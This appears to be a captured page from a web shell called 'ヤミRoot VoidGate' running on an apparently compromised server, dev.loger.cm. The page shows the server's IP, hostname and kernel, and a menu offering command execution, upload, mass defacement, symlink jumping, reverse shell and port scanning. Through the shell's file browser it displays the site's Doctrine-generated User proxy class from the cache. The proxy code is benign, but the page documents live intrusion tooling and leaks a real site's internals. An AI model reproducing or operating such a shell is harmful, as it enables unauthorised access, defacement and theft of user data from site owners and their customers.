ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
var
/
cache
/
dev
/
doctrine
/
orm
/
Proxies
/
Viewing: __CG__AppEntityUser.php
<?php namespace Proxies\__CG__\App\Entity; /** * DO NOT EDIT THIS FILE - IT WAS CREATED BY DOCTRINE'S PROXY GENERATOR */ class User extends \App\Entity\User implements \Doctrine\ORM\Proxy\Proxy { /** * @var \Closure the callback responsible for loading properties in the proxy object. This callback is called with * three parameters, being respectively the proxy object to be initialized, the method that triggered the * initialization process and an array of ordered parameters that were passed to that method. * * @see \Doctrine\Common\Proxy\Proxy::__setInitializer */ public $__initializer__; /** * @var \Closure the callback responsible of loading properties that need to be copied in the cloned object * * @see \Doctrine\Common\Proxy\Proxy::__setCloner */ public $__cloner__; /** * @var boolean flag indicating if this object was already initialized * * @see \Doctrine\Persistence\Proxy::__isInitialized */ public $__isInitialized__ = false; /** * @var array<string, null> properties to be lazy loaded, indexed by property name */ public static $lazyPropertiesNames = array ( 'userPicture' => NULL, 'lastName' => NULL, 'firstName' => NULL, 'phoneNumber' => NULL, ); /** * @var array<string, mixed> default values of properties to be lazy loaded, with keys being the property names * * @see \Doctrine\Common\Proxy\Proxy::__getLazyProperties */ public static $lazyPropertiesDefaults = array ( 'userPicture' => NULL, 'lastName' => NULL, 'firstName' => NULL, 'phoneNumber' => NULL, ); public function __construct(?\Closure $initializer = null, ?\Closure $cloner = null) { unset($this->userPicture, $this->lastName, $this->firstName, $this->phoneNumber); $this->__initializer__ = $initializer; $this->__cloner__ = $cloner; } /** * * @param string $name */ public function __get($name) { if (\array_key_exists($name, self::$lazyPropertiesNames)) { $this->__initializer__ && $this->__initializer__->__invoke($this, '__get', [$name]); return $this->$name; } trigger_error(sprintf('Undefined property: %s::$%s', __CLASS__, $name), E_USER_NOTICE); } /** * * @param string $name * @param mixed $value */ public function __set($name, $value) { if (\array_key_exists($name, self::$lazyPropertiesNames)) { $this->__initializer__ && $this->__initializer__->__invoke($this, '__set', [$name, $value]); $this->$name = $value; return; } $this->$name = $value; } /** * * @param string $name * @return boolean */ public function __isset($name) { if (\array_key_exists($name, self::$lazyPropertiesNames)) { $this->__initializer__ && $this->__initializer__->__invoke($this, '__isset', [$name]); return isset($this->$name); } return false; } /** * * @return array */ public function __sleep() { if ($this->__isInitialized__) { return ['__isInitialized__', 'id', 'userPicture', 'lastName', 'firstName', 'phoneNumber', '' . "\0" . 'App\\Entity\\User' . "\0" . 'contacts', '' . "\0" . 'App\\Entity\\User' . "\0" . 'logs', '' . "\0" . 'App\\Entity\\User' . "\0" . 'subscriptions', '' . "\0" . 'App\\Entity\\User' . "\0" . 'company', '' . "\0" . 'App\\Entity\\User' . "\0" . 'address', '' . "\0" . 'App\\Entity\\User' . "\0" . 'email', '' . "\0" . 'App\\Entity\\User' . "\0" . 'password', '' . "\0" . 'App\\Entity\\User' . "\0" . 'roles', '' . "\0" . 'App\\Entity\\User' . "\0" . 'active', '' . "\0" . 'App\\Entity\\User' . "\0" . 'salt', '' . "\0" . 'App\\Entity\\User' . "\0" . 'emailCanonical', '' . "\0" . 'App\\Entity\\User' . "\0" . 'plainPassword', '' . "\0" . 'App\\Entity\\User' . "\0" . 'confirmationToken', '' . "\0" . 'App\\Entity\\User' . "\0" . 'passwordRequestedAt', '' . "\0" . 'App\\Entity\\User' . "\0" . 'username', '' . "\0" . 'App\\Entity\\User' . "\0" . 'lastLogin', '' . "\0" . 'App\\Entity\\User' . "\0" . 'enabled', '' . "\0" . 'App\\Entity\\User' . "\0" . 'usernameCanonical', '' . "\0" . 'App\\Entity\\User' . "\0" . 'isVerified', '' . "\0" . 'App\\Entity\\User' . "\0" . 'local', '' . "\0" . 'App\\Entity\\User' . "\0" . 'loginInCount', '' . "\0" . 'App\\Entity\\User' . "\0" . 'bookingRooms', '' . "\0" . 'App\\Entity\\User' . "\0" . 'payments', '' . "\0" . 'App\\Entity\\User' . "\0" . 'resendMail', '' . "\0" . 'App\\Entity\\User' . "\0" . 'createdAt', '' . "\0" . 'App\\Entity\\User' . "\0" . 'updateAt', '' . "\0" . 'App\\Entity\\User' . "\0" . 'announceChats', '' . "\0" . 'App\\Entity\\User' . "\0" . 'announceChannels']; } return ['__isInitialized__', 'id', '' . "\0" . 'App\\Entity\\User' . "\0" . 'contacts', '' . "\0" . 'App\\Entity\\User' . "\0" . 'logs', '' . "\0" . 'App\\Entity\\User' . "\0" . 'subscriptions', '' . "\0" . 'App\\Entity\\User' . "\0" . 'company', '' . "\0" . 'App\\Entity\\User' . "\0" . 'address', '' . "\0" . 'App\\Entity\\User' . "\0" . 'email', '' . "\0" . 'App\\Entity\\User' . "\0" . 'password', '' . "\0" . 'App\\Entity\\User' . "\0" . 'roles', '' . "\0" . 'App\\Entity\\User' . "\0" . 'active', '' . "\0" . 'App\\Entity\\User' . "\0" . 'salt', '' . "\0" . 'App\\Entity\\User' . "\0" . 'emailCanonical', '' . "\0" . 'App\\Entity\\User' . "\0" . 'plainPassword', '' . "\0" . 'App\\Entity\\User' . "\0" . 'confirmationToken', '' . "\0" . 'App\\Entity\\User' . "\0" . 'passwordRequestedAt', '' . "\0" . 'App\\Entity\\User' . "\0" . 'username', '' . "\0" . 'App\\Entity\\User' . "\0" . 'lastLogin', '' . "\0" . 'App\\Entity\\User' . "\0" . 'enabled', '' . "\0" . 'App\\Entity\\User' . "\0" . 'usernameCanonical', '' . "\0" . 'App\\Entity\\User' . "\0" . 'isVerified', '' . "\0" . 'App\\Entity\\User' . "\0" . 'local', '' . "\0" . 'App\\Entity\\User' . "\0" . 'loginInCount', '' . "\0" . 'App\\Entity\\User' . "\0" . 'bookingRooms', '' . "\0" . 'App\\Entity\\User' . "\0" . 'payments', '' . "\0" . 'App\\Entity\\User' . "\0" . 'resendMail', '' . "\0" . 'App\\Entity\\User' . "\0" . 'createdAt', '' . "\0" . 'App\\Entity\\User' . "\0" . 'updateAt', '' . "\0" . 'App\\Entity\\User' . "\0" . 'announceChats', '' . "\0" . 'App\\Entity\\User' . "\0" . 'announceChannels']; } /** * */ public function __wakeup() { if ( ! $this->__isInitialized__) { $this->__initializer__ = function (User $proxy) { $proxy->__setInitializer(null); $proxy->__setCloner(null); $existingProperties = get_object_vars($proxy); foreach ($proxy::$lazyPropertiesDefaults as $property => $defaultValue) { if ( ! array_key_exists($property, $existingProperties)) { $proxy->$property = $defaultValue; } } }; unset($this->userPicture, $this->lastName, $this->firstName, $this->phoneNumber); } } /** * */ public function __clone() { $this->__cloner__ && $this->__cloner__->__invoke($this, '__clone', []); } /** * Forces initialization of the proxy */ public function __load(): void { $this->__initializer__ && $this->__initializer__->__invoke($this, '__load', []); } /** * {@inheritDoc} * @internal generated method: use only when explicitly handling proxy specific loading logic */ public function __isInitialized(): bool { return $this->__isInitialized__; } /** * {@inheritDoc} * @internal generated method: use only when explicitly handling proxy specific loading logic */ public function __setInitialized($initialized): void { $this->__isInitialized__ = $initialized; } /** * {@inheritDoc} * @internal generated method: use only when explicitly handling proxy specific loading logic */ public function __setInitializer(\Closure $initializer = null): void { $this->__initializer__ = $initializer; } /** * {@inheritDoc} * @internal generated method: use only when explicitly handling proxy specific loading logic */ public function __getInitializer(): ?\Closure { return $this->__initializer__; } /** * {@inheritDoc} * @internal generated method: use only when explicitly handling proxy specific loading logic */ public function __setCloner(\Closure $cloner = null): void { $this->__cloner__ = $cloner; } /** * {@inheritDoc} * @internal generated method: use only when explicitly handling proxy specific cloning logic */ public function __getCloner(): ?\Closure { return $this->__cloner__; } /** * {@inheritDoc} * @internal generated method: use only when explicitly handling proxy specific loading logic * @deprecated no longer in use - generated code now relies on internal components rather than generated public API * @static */ public function __getLazyProperties(): array { return self::$lazyPropertiesDefaults; } /** * {@inheritDoc} */ public function getLastName(): ?string { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getLastName', []); return parent::getLastName(); } /** * {@inheritDoc} */ public function setId(?int $id) { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setId', [$id]); return parent::setId($id); } /** * {@inheritDoc} */ public function setLastName(?string $lastName): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setLastName', [$lastName]); return parent::setLastName($lastName); } /** * {@inheritDoc} */ public function getFirstName(): ?string { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getFirstName', []); return parent::getFirstName(); } /** * {@inheritDoc} */ public function setFirstName(?string $firstName): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setFirstName', [$firstName]); return parent::setFirstName($firstName); } /** * {@inheritDoc} */ public function getPhoneNumber(): ?string { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getPhoneNumber', []); return parent::getPhoneNumber(); } /** * {@inheritDoc} */ public function setPhoneNumber(?string $phoneNumber): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setPhoneNumber', [$phoneNumber]); return parent::setPhoneNumber($phoneNumber); } /** * {@inheritDoc} */ public function getContacts(): \Doctrine\Common\Collections\Collection { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getContacts', []); return parent::getContacts(); } /** * {@inheritDoc} */ public function getLogs(): \Doctrine\Common\Collections\Collection { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getLogs', []); return parent::getLogs(); } /** * {@inheritDoc} */ public function addContact(\App\Entity\Contact $contact): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'addContact', [$contact]); return parent::addContact($contact); } /** * {@inheritDoc} */ public function addLogs(\App\Entity\Logs $logs): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'addLogs', [$logs]); return parent::addLogs($logs); } /** * {@inheritDoc} */ public function removeContact(\App\Entity\Contact $contact): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'removeContact', [$contact]); return parent::removeContact($contact); } /** * {@inheritDoc} */ public function removeLogs(\App\Entity\Logs $logs): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'removeLogs', [$logs]); return parent::removeLogs($logs); } /** * {@inheritDoc} */ public function getSubscriptions(): \Doctrine\Common\Collections\Collection { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getSubscriptions', []); return parent::getSubscriptions(); } /** * {@inheritDoc} */ public function addSubscription(\App\Entity\Subscription $subscription): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'addSubscription', [$subscription]); return parent::addSubscription($subscription); } /** * {@inheritDoc} */ public function removeSubscription(\App\Entity\Subscription $subscription): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'removeSubscription', [$subscription]); return parent::removeSubscription($subscription); } /** * {@inheritDoc} */ public function getCompany(): ?\App\Entity\Company { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getCompany', []); return parent::getCompany(); } /** * {@inheritDoc} */ public function setCompany(?\App\Entity\Company $company): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setCompany', [$company]); return parent::setCompany($company); } /** * {@inheritDoc} */ public function getAddress(): ?\App\Entity\Address { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getAddress', []); return parent::getAddress(); } /** * {@inheritDoc} */ public function setAddress(?\App\Entity\Address $address): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setAddress', [$address]); return parent::setAddress($address); } /** * {@inheritDoc} */ public function getEmail(): ?string { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getEmail', []); return parent::getEmail(); } /** * {@inheritDoc} */ public function setEmail(string $email): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setEmail', [$email]); return parent::setEmail($email); } /** * {@inheritDoc} */ public function getPassword(): ?string { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getPassword', []); return parent::getPassword(); } /** * {@inheritDoc} */ public function setPassword(string $password): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setPassword', [$password]); return parent::setPassword($password); } /** * {@inheritDoc} */ public function getRoles(): array { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getRoles', []); return parent::getRoles(); } /** * {@inheritDoc} */ public function setRoles(array $roles): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setRoles', [$roles]); return parent::setRoles($roles); } /** * {@inheritDoc} */ public function isActive(): ?bool { $this->__initializer__ && $this->__initializer__->__invoke($this, 'isActive', []); return parent::isActive(); } /** * {@inheritDoc} */ public function setActive(bool $active): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setActive', [$active]); return parent::setActive($active); } /** * {@inheritDoc} */ public function getSalt(): ?string { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getSalt', []); return parent::getSalt(); } /** * {@inheritDoc} */ public function setSalt(?string $salt): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setSalt', [$salt]); return parent::setSalt($salt); } /** * {@inheritDoc} */ public function getEmailCanonical(): ?string { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getEmailCanonical', []); return parent::getEmailCanonical(); } /** * {@inheritDoc} */ public function setEmailCanonical(string $emailCanonical): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setEmailCanonical', [$emailCanonical]); return parent::setEmailCanonical($emailCanonical); } /** * {@inheritDoc} */ public function getPlainPassword(): ?string { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getPlainPassword', []); return parent::getPlainPassword(); } /** * {@inheritDoc} */ public function setPlainPassword(string $plainPassword): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setPlainPassword', [$plainPassword]); return parent::setPlainPassword($plainPassword); } /** * {@inheritDoc} */ public function getConfirmationToken(): ?string { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getConfirmationToken', []); return parent::getConfirmationToken(); } /** * {@inheritDoc} */ public function setConfirmationToken(string $confirmationToken): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setConfirmationToken', [$confirmationToken]); return parent::setConfirmationToken($confirmationToken); } /** * {@inheritDoc} */ public function getPasswordRequestedAt(): ?\DateTimeImmutable { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getPasswordRequestedAt', []); return parent::getPasswordRequestedAt(); } /** * {@inheritDoc} */ public function setPasswordRequestedAt(\DateTimeImmutable $passwordRequestedAt): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setPasswordRequestedAt', [$passwordRequestedAt]); return parent::setPasswordRequestedAt($passwordRequestedAt); } /** * {@inheritDoc} */ public function getUsername(): ?string { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getUsername', []); return parent::getUsername(); } /** * {@inheritDoc} */ public function setUsername(string $username): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setUsername', [$username]); return parent::setUsername($username); } /** * {@inheritDoc} */ public function eraseCredentials() { $this->__initializer__ && $this->__initializer__->__invoke($this, 'eraseCredentials', []); return parent::eraseCredentials(); } /** * {@inheritDoc} */ public function getUserIdentifier(): string { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getUserIdentifier', []); return parent::getUserIdentifier(); } /** * {@inheritDoc} */ public function addRole($role) { $this->__initializer__ && $this->__initializer__->__invoke($this, 'addRole', [$role]); return parent::addRole($role); } /** * {@inheritDoc} */ public function isEnabled() { $this->__initializer__ && $this->__initializer__->__invoke($this, 'isEnabled', []); return parent::isEnabled(); } /** * {@inheritDoc} */ public function isSuperAdmin() { $this->__initializer__ && $this->__initializer__->__invoke($this, 'isSuperAdmin', []); return parent::isSuperAdmin(); } /** * {@inheritDoc} */ public function hasRole($role) { $this->__initializer__ && $this->__initializer__->__invoke($this, 'hasRole', [$role]); return parent::hasRole($role); } /** * {@inheritDoc} */ public function removeRole($role) { $this->__initializer__ && $this->__initializer__->__invoke($this, 'removeRole', [$role]); return parent::removeRole($role); } /** * {@inheritDoc} */ public function setSuperAdmin($boolean) { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setSuperAdmin', [$boolean]); return parent::setSuperAdmin($boolean); } /** * {@inheritDoc} */ public function setLastLogin(\DateTimeImmutable $time = NULL) { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setLastLogin', [$time]); return parent::setLastLogin($time); } /** * {@inheritDoc} */ public function getLastLogin(): ?\DateTimeImmutable { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getLastLogin', []); return parent::getLastLogin(); } /** * {@inheritDoc} */ public function isPasswordRequestNonExpired($ttl) { $this->__initializer__ && $this->__initializer__->__invoke($this, 'isPasswordRequestNonExpired', [$ttl]); return parent::isPasswordRequestNonExpired($ttl); } /** * {@inheritDoc} */ public function setEnabled(bool $enabled): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setEnabled', [$enabled]); return parent::setEnabled($enabled); } /** * {@inheritDoc} */ public function getId() { if ($this->__isInitialized__ === false) { return (int) parent::getId(); } $this->__initializer__ && $this->__initializer__->__invoke($this, 'getId', []); return parent::getId(); } /** * {@inheritDoc} */ public function getUsernameCanonical(): ?string { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getUsernameCanonical', []); return parent::getUsernameCanonical(); } /** * {@inheritDoc} */ public function setUsernameCanonical(string $usernameCanonical): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setUsernameCanonical', [$usernameCanonical]); return parent::setUsernameCanonical($usernameCanonical); } /** * {@inheritDoc} */ public function isVerified(): bool { $this->__initializer__ && $this->__initializer__->__invoke($this, 'isVerified', []); return parent::isVerified(); } /** * {@inheritDoc} */ public function setIsVerified(bool $isVerified): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setIsVerified', [$isVerified]); return parent::setIsVerified($isVerified); } /** * {@inheritDoc} */ public function __toString() { $this->__initializer__ && $this->__initializer__->__invoke($this, '__toString', []); return parent::__toString(); } /** * {@inheritDoc} */ public function getLocal(): ?string { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getLocal', []); return parent::getLocal(); } /** * {@inheritDoc} */ public function setLocal(string $local): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setLocal', [$local]); return parent::setLocal($local); } /** * {@inheritDoc} */ public function getLoginInCount(): ?int { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getLoginInCount', []); return parent::getLoginInCount(); } /** * {@inheritDoc} */ public function setLoginInCount(?int $loginInCount): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setLoginInCount', [$loginInCount]); return parent::setLoginInCount($loginInCount); } /** * {@inheritDoc} */ public function getBookingRooms(): \Doctrine\Common\Collections\Collection { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getBookingRooms', []); return parent::getBookingRooms(); } /** * {@inheritDoc} */ public function addBookingRoom(\App\Entity\BookingRoom $bookingRoom): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'addBookingRoom', [$bookingRoom]); return parent::addBookingRoom($bookingRoom); } /** * {@inheritDoc} */ public function removeBookingRoom(\App\Entity\BookingRoom $bookingRoom): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'removeBookingRoom', [$bookingRoom]); return parent::removeBookingRoom($bookingRoom); } /** * {@inheritDoc} */ public function getPayments(): \Doctrine\Common\Collections\Collection { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getPayments', []); return parent::getPayments(); } /** * {@inheritDoc} */ public function addPayment(\App\Entity\Payment $payment): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'addPayment', [$payment]); return parent::addPayment($payment); } /** * {@inheritDoc} */ public function removePayment(\App\Entity\Payment $payment): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'removePayment', [$payment]); return parent::removePayment($payment); } /** * {@inheritDoc} */ public function getResendMail(): ?string { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getResendMail', []); return parent::getResendMail(); } /** * {@inheritDoc} */ public function setResendMail(?string $resendMail): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setResendMail', [$resendMail]); return parent::setResendMail($resendMail); } /** * {@inheritDoc} */ public function getCreatedAt(): ?\DateTimeImmutable { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getCreatedAt', []); return parent::getCreatedAt(); } /** * {@inheritDoc} */ public function setCreatedAt(\DateTimeImmutable $createdAt): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setCreatedAt', [$createdAt]); return parent::setCreatedAt($createdAt); } /** * {@inheritDoc} */ public function getUpdateAt(): ?\DateTimeImmutable { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getUpdateAt', []); return parent::getUpdateAt(); } /** * {@inheritDoc} */ public function setUpdateAt(\DateTimeImmutable $updateAt): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'setUpdateAt', [$updateAt]); return parent::setUpdateAt($updateAt); } /** * {@inheritDoc} */ public function getAnnounceChats(): \Doctrine\Common\Collections\Collection { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getAnnounceChats', []); return parent::getAnnounceChats(); } /** * {@inheritDoc} */ public function addAnnounceChat(\App\Entity\AnnounceChat $announceChat): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'addAnnounceChat', [$announceChat]); return parent::addAnnounceChat($announceChat); } /** * {@inheritDoc} */ public function removeAnnounceChat(\App\Entity\AnnounceChat $announceChat): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'removeAnnounceChat', [$announceChat]); return parent::removeAnnounceChat($announceChat); } /** * {@inheritDoc} */ public function getAnnounceChannels(): \Doctrine\Common\Collections\Collection { $this->__initializer__ && $this->__initializer__->__invoke($this, 'getAnnounceChannels', []); return parent::getAnnounceChannels(); } /** * {@inheritDoc} */ public function addAnnounceChannel(\App\Entity\AnnounceChannel $announceChannel): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'addAnnounceChannel', [$announceChannel]); return parent::addAnnounceChannel($announceChannel); } /** * {@inheritDoc} */ public function removeAnnounceChannel(\App\Entity\AnnounceChannel $announceChannel): \App\Entity\User { $this->__initializer__ && $this->__initializer__->__invoke($this, 'removeAnnounceChannel', [$announceChannel]); return parent::removeAnnounceChannel($announceChannel); } }
Coded With 💗 by
0x6ick